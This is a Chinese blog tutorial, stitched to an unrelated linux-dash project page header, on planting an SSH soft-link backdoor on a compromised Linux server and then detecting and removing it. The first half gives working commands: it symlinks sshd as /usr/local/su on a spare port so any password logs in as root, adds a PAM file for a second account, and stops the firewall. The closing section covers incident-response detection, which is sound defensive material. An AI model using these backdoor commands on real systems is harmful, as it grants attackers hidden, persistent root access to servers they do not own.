LINUX留后门--教程(二)—— SSH软链接后门
linux-dash
A beautiful web dashboard for Linux
项目地址:https://gitcode.com/gh_mirrors/li/linux-dash
免费下载资源
·
一、本教程作用
1、用在攻击的途径上
2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?
不知攻,焉知防
二、SSH软链接后门-教程
前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限
环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机)
在目标服务器上执行命令:
1、第一种:创建root账户 ssh软链接后门命令:
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 #ssh软链接
systemctl stop firewalld.service #关闭服务器的防火墙,不然连接不上
连接软链接后门测试:
此处密码可以随意
ssh root@XXX.XXX.XXX.XXX -p 12345
2、第二种:创建其它账户 ssh软连接后门命令
前提: 服务器存在普通账户wxg
第一步执行以下命令:
echo "
#%PAM-1.0
auth sufficient pam_rootok.so
auth include system-auth
account include system-auth
password include system-auth
session include system-auth " >> /etc/pam.d/wxg
第二步执行开启软链接命令
ln -sf /usr/sbin/sshd /tmp/wxg;/tmp/wxg -oPort=14725
systemctl stop firewalld.service #关闭服务器的防火墙,不然连接不上
kali远程连接wxg账户测试成功
三、SSH软链接后门——应急响应发现
第一步:查看服务器开放的端口号
netstat -anpt
发现开启有12345、14725异常端口,且名字为su、wxg,且su的PID 为7702
查看PID 7702所使用的程序为ssh
ll /proc/7702
第二步:确定软链接后门文件
查看所有的su文件,以及查找具体哪一个su是软链接后门
find -name su
ll /usr/share/bash-completion/completions/su
ll /usr/local/su
最终确定软链接为:/usr/local/su
第三步:删除软链接后门
rm -rf /usr/local/su
kill -9 7702
切记: 不要用 rm -rf /usr/local/su/,如果后面多一个斜杠,就会把文件删除!
软链接被成功清除,登录不上了
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
GitHub 加速计划 / li / linux-dash
10.39 K
1.2 K
下载
A beautiful web dashboard for Linux
最近提交(Master分支:1 个月前 )
186a802e
added ecosystem file for PM2 4 年前
5def40a3
Add host customization support for the NodeJS version 4 年前
更多推荐
已为社区贡献11条内容
所有评论(0)